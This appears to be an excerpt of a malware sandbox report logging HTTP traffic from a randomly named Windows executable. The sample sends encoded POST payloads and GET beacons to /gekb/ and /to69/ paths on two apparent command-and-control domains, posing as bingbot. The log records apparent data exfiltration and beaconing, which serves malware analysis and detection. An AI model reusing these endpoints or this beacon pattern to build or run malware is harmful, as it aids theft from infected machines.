                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                            Sep 26, 2024 15:25:02.494355917 CEST | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                            Sep 26, 2024 15:25:02.494369984 CEST | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            13 | 192.168.2.7 | 49718 | 208.91.197.27 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:08.586146116 CEST | 641 | OUT | POST /gekb/ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kevin-torkelson.info
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.kevin-torkelson.info/gekb/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 30 78 65 44 37 39 54 4f 48 33 6d 67 68 6a 75 58 49 52 73 64 63 33 50 7a 62 57 58 2b 58 4c 76 62 76 47 6d 4d 72 38 58 4d 67 69 71 4d 4b 42 67 62 54 76 43 35 50 4f 66 51 66 57 38 41 58 4f 53 65 50 51 34 51 73 6b 61 52 76 52 53 61 49 5a 45 50 37 6d 65 5a 55 6c 6e 44 72 45 72 6d 6b 38 2b 6c 75 63 54 38 5a 72 33 2f 75 42 39 5a 2b 43 64 4f 79 75 38 6c 42 46 59 41 46 4c 6c 48 46 43 32 62 43 4d 6e 4e 35 73 30 49 54 79 70 50 6c 4d 56 48 76 55 62 79 31 4d 34 6e 48 68 50 30 5a 53 79 4f 46 36 50 72 72 43 4f 6f 62 37 53 43 68 74 48 51 53 46 6c 58 47 45 39 48 35 65 5a 61 63 4f 37 62 6e 43 37 57 53 38 76 4b 78 33 58 68 46 4e 56 50 79 41 3d 3d
                            Data Ascii: Z0=0xeD79TOH3mghjuXIRsdc3PzbWX+XLvbvGmMr8XMgiqMKBgbTvC5POfQfW8AXOSePQ4QskaRvRSaIZEP7meZUlnDrErmk8+lucT8Zr3/uB9Z+CdOyu8lBFYAFLlHFC2bCMnN5s0ITypPlMVHvUby1M4nHhP0ZSyOF6PrrCOob7SChtHQSFlXGE9H5eZacO7bnC7WS8vKx3XhFNVPyA==


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            14 | 192.168.2.7 | 49719 | 208.91.197.27 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:11.131480932 CEST | 661 | OUT | POST /gekb/ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kevin-torkelson.info
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.kevin-torkelson.info/gekb/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 30 78 65 44 37 39 54 4f 48 33 6d 67 6e 44 65 58 4e 79 55 64 4c 6e 50 38 43 57 58 2b 63 72 75 63 76 47 71 4d 72 39 54 63 68 58 61 4d 54 6c 73 62 53 75 43 35 4d 4f 66 51 55 32 38 5a 4b 65 53 46 50 51 30 69 73 6c 32 52 76 52 57 61 49 63 67 50 37 56 32 61 58 56 6e 46 6b 6b 72 6b 35 4d 2b 6c 75 63 54 38 5a 72 6a 5a 75 42 6c 5a 2b 79 4e 4f 67 66 38 6b 65 31 59 44 54 37 6c 48 42 43 32 66 43 4d 6d 59 35 70 51 79 54 78 52 50 6c 4d 6c 48 75 42 6e 7a 38 4d 34 68 59 52 50 67 63 6e 4f 65 43 50 37 56 69 42 4f 55 63 49 43 42 6b 62 61 79 49 6e 70 37 59 56 46 38 39 63 39 73 4c 6f 6d 75 6c 44 2f 4f 66 65 62 72 75 41 79 4c 49 66 30 4c 6b 7a 70 6a 79 73 64 45 72 65 77 54 37 64 30 4a 35 4a 45 46 47 6e 51 3d
                            Data Ascii: Z0=0xeD79TOH3mgnDeXNyUdLnP8CWX+crucvGqMr9TchXaMTlsbSuC5MOfQU28ZKeSFPQ0isl2RvRWaIcgP7V2aXVnFkkrk5M+lucT8ZrjZuBlZ+yNOgf8ke1YDT7lHBC2fCMmY5pQyTxRPlMlHuBnz8M4hYRPgcnOeCP7ViBOUcICBkbayInp7YVF89c9sLomulD/OfebruAyLIf0LkzpjysdErewT7d0J5JEFGnQ=


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            15 | 192.168.2.7 | 49720 | 208.91.197.27 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:13.708141088 CEST | 1674 | OUT | POST /gekb/ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kevin-torkelson.info
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.kevin-torkelson.info/gekb/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 30 78 65 44 37 39 54 4f 48 33 6d 67 6e 44 65 58 4e 79 55 64 4c 6e 50 38 43 57 58 2b 63 72 75 63 76 47 71 4d 72 39 54 63 68 57 4f 4d 50 47 6b 62 54 4e 61 35 4e 4f 66 51 58 32 38 45 4b 65 53 49 50 51 73 63 73 6c 71 37 76 54 65 61 4a 36 73 50 39 6b 32 61 4d 46 6e 46 76 45 72 6c 6b 38 2b 4b 75 63 6a 6a 5a 72 7a 5a 75 42 6c 5a 2b 77 46 4f 77 65 38 6b 59 31 59 41 46 4c 6c 54 46 43 32 33 43 4d 76 6a 35 70 55 59 54 42 78 50 6c 6f 4a 48 70 7a 50 7a 39 73 34 6a 5a 52 4f 6e 63 6e 4c 5a 43 4c 6a 7a 69 43 53 79 63 4b 53 42 6b 36 7a 39 51 45 52 6b 4f 57 67 70 39 64 78 36 46 4f 4f 63 38 77 62 46 5a 35 4c 54 72 6e 47 72 51 38 4d 4c 71 45 73 67 69 39 68 4c 6a 75 77 6d 31 35 35 6c 36 72 41 52 59 68 53 44 42 54 30 37 63 34 72 55 73 71 4b 70 33 78 53 51 71 6f 6a 71 47 47 31 5a 32 70 76 73 6e 47 64 6f 47 52 53 30 38 6d 7a 33 5a 42 6f 77 42 7a 6d 46 58 41 68 65 69 51 32 7a 47 61 6f 4c 2b 2b 2b 77 33 4b 64 74 49 7a 46 50 43 2b 38 45 72 39 48 50 6e 4d 6f 5a 65 68 79 52 61 6f 67 63 47 6b 79 4a 66 4f 53 2b 46 70 52 [TRUNCATED]
                            Data Ascii: Z0= [TRUNCATED]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            16 | 192.168.2.7 | 49721 | 208.91.197.27 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:16.256067038 CEST | 361 | OUT | GET /gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:25:50.532761097 CEST | 1236 | IN | HTTP/1.1 200 OK
                            Date: Thu, 26 Sep 2024 13:25:50 GMT
                            Server: Apache
                            Referrer-Policy: no-referrer-when-downgrade
                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                            Set-Cookie: vsid=902vr474902750372110466; expires=Tue, 25-Sep-2029 13:25:50 GMT; Max-Age=157680000; path=/; domain=www.kevin-torkelson.info; HttpOnly
                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XvmJoWHVDogSnXdjXY/62iVWGynTob7SSp1QJFdp6Ha2eQs0rimmRsCxelX+j/LOWkcoqxnfw+iQghU6wSjw1g==
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                            Data Raw: 31 36 35 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72
                            Data Ascii: 1651e<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager
                            Sep 26, 2024 15:25:50.532783031 CEST | 1236 | IN | Data Raw: 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f
                            Data Ascii: .net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid
                            Sep 26, 2024 15:25:50.532808065 CEST | 1236 | IN | Data Raw: 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74
                            Data Ascii: unction(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="lang
                            Sep 26, 2024 15:25:50.532824039 CEST | 1236 | IN | Data Raw: 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61
                            Data Ascii: languages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.h
                            Sep 26, 2024 15:25:50.532942057 CEST | 781 | IN | Data Raw: 22 26 22 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26
                            Data Ascii: "&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}
                            Sep 26, 2024 15:25:50.532958984 CEST | 1236 | IN | Data Raw: 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e
                            Data Ascii: .type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t
                            Sep 26, 2024 15:25:50.532974005 CEST | 1236 | IN | Data Raw: 65 3d 62 2e 6c 65 6e 67 74 68 7d 62 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 65 2c 62 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 28 66 29 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61
                            Data Ascii: e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"st
                            Sep 26, 2024 15:25:50.532989025 CEST | 1236 | IN | Data Raw: 74 65 6e 65 72 49 64 3a 63 2c 64 61 74 61 3a 74 72 75 65 2c 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e
                            Data Ascii: tenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemove
                            Sep 26, 2024 15:25:50.533006907 CEST | 1236 | IN | Data Raw: 5f 74 63 66 61 70 69 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 74 63 66 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63
                            Data Ascii: _tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;win
                            Sep 26, 2024 15:25:50.533023119 CEST | 1236 | IN | Data Raw: 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 74 63 66 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e
                            Data Ascii: mp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cm
                            Sep 26, 2024 15:25:50.539412975 CEST | 1236 | IN | Data Raw: 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 36 32 30 27 20 62 3d 27 33 33 35 36 35 27 20 63 3d 27 6b 65 76 69 6e 2d 74 6f 72 6b 65 6c 73 6f 6e 2e 69 6e 66 6f 27 20 64 3d 27 65 6e 74 69 74 79 5f 6d
                            Data Ascii: meta name="tids" content="a='29620' b='33565' c='kevin-torkelson.info' d='entity_mapped'" /><title>Kevin-torkelson.info</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript">(window.NREUM||(


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            17 | 192.168.2.7 | 49722 | 162.0.238.43 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:56.109569073 CEST | 614 | OUT | POST /to69/ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.mandemj.top
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.mandemj.top/to69/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 75 6c 5a 37 4c 52 56 55 75 36 4b 35 34 31 63 59 51 62 33 57 54 52 55 32 43 54 6f 4f 6a 38 5a 49 5a 79 55 6d 78 5a 4a 75 52 4b 2f 54 67 35 65 58 6a 6d 45 6e 6f 30 71 54 32 35 62 49 65 6c 4f 57 62 73 68 33 35 31 31 4c 54 6a 55 54 5a 65 66 6c 52 6a 48 65 64 4c 6c 76 70 38 2b 37 6e 31 6d 30 36 6c 52 56 43 30 42 6c 37 6b 43 65 4d 47 51 34 69 61 56 41 38 66 4f 70 42 6b 5a 32 30 4e 61 69 4b 2f 62 66 63 64 53 75 74 70 55 37 50 49 56 67 42 66 38 41 72 79 4e 38 59 4e 64 78 75 41 69 43 56 39 47 73 49 76 7a 34 30 61 58 42 50 78 62 6a 59 58 6a 50 69 4f 6e 36 35 73 43 31 41 53 6d 4b 6f 36 62 44 4d 4d 6e 41 4c 76 46 72 2f 4e 31 7a 67 41 3d 3d
                            Data Ascii: Z0=ulZ7LRVUu6K541cYQb3WTRU2CToOj8ZIZyUmxZJuRK/Tg5eXjmEno0qT25bIelOWbsh3511LTjUTZeflRjHedLlvp8+7n1m06lRVC0Bl7kCeMGQ4iaVA8fOpBkZ20NaiK/bfcdSutpU7PIVgBf8AryN8YNdxuAiCV9GsIvz40aXBPxbjYXjPiOn65sC1ASmKo6bDMMnALvFr/N1zgA==
                            Sep 26, 2024 15:25:56.710685015 CEST | 533 | IN | HTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:25:56 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            18 | 192.168.2.7 | 49723 | 162.0.238.43 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:25:58.664242029 CEST | 634 | OUT | POST /to69/ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.mandemj.top
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.mandemj.top/to69/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 75 6c 5a 37 4c 52 56 55 75 36 4b 35 35 56 73 59 58 39 2f 57 56 78 55 35 4e 7a 6f 4f 74 73 5a 55 5a 79 6f 6d 78 62 6b 31 52 63 58 54 6e 63 69 58 69 6a 6f 6e 70 30 71 54 75 70 62 4e 42 56 4f 42 62 73 74 46 35 78 31 4c 54 6a 41 54 5a 63 33 6c 53 55 62 5a 66 62 6c 68 67 63 2b 35 34 46 6d 30 36 6c 52 56 43 33 39 50 37 6b 61 65 51 6d 67 34 6a 37 56 44 69 76 4f 71 57 55 5a 32 6c 64 61 35 4b 2f 62 70 63 64 69 45 74 73 51 37 50 4e 70 67 42 4f 38 42 2b 43 4d 31 46 39 63 6b 71 53 7a 35 66 50 4f 75 50 75 58 73 78 72 66 38 4b 48 47 42 43 31 76 6a 38 66 66 42 39 75 6d 44 58 30 37 2f 71 37 66 62 42 75 54 68 55 59 67 42 79 66 55 33 32 39 4a 78 56 75 50 4d 74 69 46 30 78 39 38 4a 6e 35 5a 44 35 5a 30 3d
                            Data Ascii: Z0=ulZ7LRVUu6K55VsYX9/WVxU5NzoOtsZUZyomxbk1RcXTnciXijonp0qTupbNBVOBbstF5x1LTjATZc3lSUbZfblhgc+54Fm06lRVC39P7kaeQmg4j7VDivOqWUZ2lda5K/bpcdiEtsQ7PNpgBO8B+CM1F9ckqSz5fPOuPuXsxrf8KHGBC1vj8ffB9umDX07/q7fbBuThUYgByfU329JxVuPMtiF0x98Jn5ZD5Z0=
                            Sep 26, 2024 15:25:59.236140013 CEST | 533 | IN | HTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:25:59 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
